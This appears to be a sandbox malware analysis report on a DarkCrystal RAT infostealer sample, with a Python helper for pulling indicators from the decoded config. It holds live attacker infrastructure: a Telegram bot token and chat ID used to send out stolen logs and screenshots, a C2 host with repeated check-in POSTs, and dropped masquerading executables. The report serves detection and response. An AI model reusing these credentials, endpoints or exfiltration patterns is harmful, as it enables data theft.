Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\0eDO5Zbs.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | ReversingLabs: Detection: 73%
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | ReversingLabs: Detection: 73%
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | ReversingLabs: Detection: 73%
Source: C:\Recovery\0eDO5Zbs.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\NClzZRhR.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\NnjhOJZu.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\QCzpQABH.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\WWtOxrLm.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\XOSeUCEW.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\dGvExiJK.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\hJPUkngW.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\nluLvNRG.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\oGDUNCaL.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\oiVTRNgB.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\vSXJQEeZ.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\wMeJBGvi.log | ReversingLabs: Detection: 70%
Source: C:\Windows\System32\r6Lr6XbTWt.exe | ReversingLabs: Detection: 73%
Source: VQdUvAQ4xO.exe | Virustotal: Detection: 68%
Source: VQdUvAQ4xO.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CEHidmAX.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LuUydMov.log | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Joe Sandbox ML: detected
Source: C:\Recovery\0eDO5Zbs.exe | Joe Sandbox ML: detected
Source: VQdUvAQ4xO.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmp | String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"TelegramNotifer":{"chatid":"6401160547","bottoken":"7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}
Source: 00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-4J6ByaDz5UAU0y0XiBQ1","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: VQdUvAQ4xO.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Windows Sidebar\5a424686c5d9ea
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Windows Portable Devices\7252974aa180da
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Microsoft\b730a2198d720a
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: VQdUvAQ4xO.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.pdb | source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000031CB000.00000004.00000800.00020000.00000000.sdmp
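The two String decryptor entries above are the sample's decrypted configuration: a JSON object with the Telegram notifier settings, and a settings array whose trailing entries are JSON wrapped in further layers of base64. The Python below is an added example (not the sample's code and not a Joe Sandbox feature) that peels those layers recursively and extracts the indicators a responder would act on: the bot token and chat ID, the URL prefix every Telegram call from this build will use, and the DCRat mutex name. Both input strings are copied from the entries above; the key name TelegramNotifer is spelled as it appears in the config, and the unwrap heuristics (minimum length, base64 alphabet check, depth limit) are the example's own.

```python
import base64
import json
import re

# Constructed from the two "String decryptor" lines in this report: the notifier
# config object and the settings array whose last entries are base64-wrapped JSON.
NOTIFIER_CONFIG = r'''{"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"TelegramNotifer":{"chatid":"6401160547","bottoken":"7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}'''
SETTINGS_ARRAY = r'''["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-4J6ByaDz5UAU0y0XiBQ1","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]'''

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def unwrap(value, depth=0, max_depth=8):
    """Peel DCRat-style layering: a string holding base64 of JSON is replaced by the
    parsed JSON, and the strings inside that are tried again, until a leaf is reached."""
    if isinstance(value, list):
        return [unwrap(v, depth, max_depth) for v in value]
    if isinstance(value, dict):
        return {k: unwrap(v, depth, max_depth) for k, v in value.items()}
    if isinstance(value, str) and depth < max_depth and len(value) >= 8 and B64_RE.match(value):
        try:
            padded = value + "=" * (-len(value) % 4)
            parsed = json.loads(base64.b64decode(padded).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            return value  # random-looking blob (a key, an ID), not another layer
        return unwrap(parsed, depth + 1, max_depth)
    return value


def extract_iocs(notifier_json, settings_json):
    cfg = json.loads(notifier_json)
    tg = cfg["TelegramNotifer"]  # key name exactly as spelled in the decrypted config
    settings = unwrap(json.loads(settings_json))
    mutex = next(s for s in settings if isinstance(s, str) and s.startswith("DCR_MUTEX-"))
    return {
        "telegram_bot_token": tg["bottoken"],
        "telegram_chat_id": tg["chatid"],
        # Every call the notifier makes starts with this prefix: the string to hunt for
        # in proxy logs and the token to report to Telegram for revocation.
        "telegram_url_prefix": f"https://api.telegram.org/bot{tg['bottoken']}/",
        "notify_on_first_connect": tg.get("sendmessageonce") == "True",
        "notify_on_stealer_log": tg.get("sendloginfostealer") == "True",
        "mutex": mutex,
        "settings": settings,
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(NOTIFIER_CONFIG, SETTINGS_ARRAY), indent=2))
```

The first array element and the mutex are deliberately left alone by unwrap: one is not valid UTF-8 JSON once decoded and the other is not base64 at all, which is the stop condition that keeps the recursion from mangling opaque values.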

                              Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File opened: C:\Users\user\AppData\Local

                              Networking

                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 104.21.95.93:80
                              Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49751 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49733 -> 149.154.167.220:443
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: unknownDNS query: name: api.telegram.org
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: POST /bot7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="313b427a-59e5-4849-a91a-75e00f68a976"Host: api.telegram.orgContent-Length: 82628Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: POST /bot7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="d905710a-4bb7-429f-999a-55dcd7e3e939"Host: api.telegram.orgContent-Length: 84854Expect: 100-continueConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: unknownDNS query: name: ipinfo.io
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 34.117.59.81:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 34.117.59.81:443
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 336 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 384 | Expect: 100-continue
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 1828 | Expect: 100-continue
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2532 | Expect: 100-continue
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 142536 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 1856 | Expect: 100-continue
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 1820 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 1856 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2532 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 1836 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
